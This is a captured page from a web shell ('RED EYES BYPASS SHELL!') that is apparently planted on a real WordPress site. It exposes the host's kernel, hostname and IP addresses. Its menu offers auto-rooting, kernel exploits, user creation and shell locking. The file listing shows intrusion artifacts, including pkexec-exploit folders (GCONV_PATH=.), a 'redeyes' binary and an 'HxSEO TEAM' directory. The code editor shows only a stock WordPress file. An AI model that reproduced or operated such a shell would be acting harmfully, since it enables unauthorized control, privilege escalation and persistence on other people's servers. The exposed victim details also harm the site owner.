Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
www /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.malware-scripts
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
HxSEO TEAM
[ DIR ]
drwxr-xr-x
backups-malware-20260111-160302
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-diagnostic-20260111-153935
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwx---r-x
wp-scan-complet-20260111-154905
[ DIR ]
drwxr-xr-x
wp-surveillance
[ DIR ]
drwxr-xr-x
.htaccess
5.5
KB
-rw----r--
.htaccessOLD
5.63
KB
-rw----r--
.htpasswdOLD
68
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
categorie-sitemap.xml
0
B
-rw----r--
cpt_services-sitemap.xml
0
B
-rw----r--
cpt_testimonials-sitemap.xml
762
B
-rw----r--
google03217d099396880d.html
53
B
-rw----r--
index.php
405
B
-rw-r--r--
index.php.backup-20260111-154245
902
B
-rw-r--r--
index.php.backup-20260111-164235
902
B
-r--r--r--
index.php.backup-20260111-164248
902
B
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
message-sitemap.xml
64.31
KB
-rw----r--
orateur-sitemap.xml
2.33
KB
-rw----r--
page-sitemap.xml
2.63
KB
-rw----r--
rapport-mises-a-jour-20260114-135211.txt
3.26
KB
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
redeyes
10.99
KB
-rwxr-xr-x
robots.txt
1.27
KB
-rw----r--
serie-sitemap.xml
883
B
-rw----r--
sync-latest-message.config.json
467
B
-rw----r--
sync-latest-message.php
13.33
KB
-rw-r--r--
test.txt
4
B
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw----r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
4.25
KB
-rw----r--
wp-config.php.backup-20260114-145700
4.25
KB
-rw-------
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.23
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-sitemap.xml
0
B
-rw----r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } header( 'Allow: POST' ); header( "$protocol 405 Method Not Allowed" ); header( 'Content-Type: text/plain' ); exit; } /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = (int) $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( '<p>' . $comment->get_error_message() . '</p>', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
Close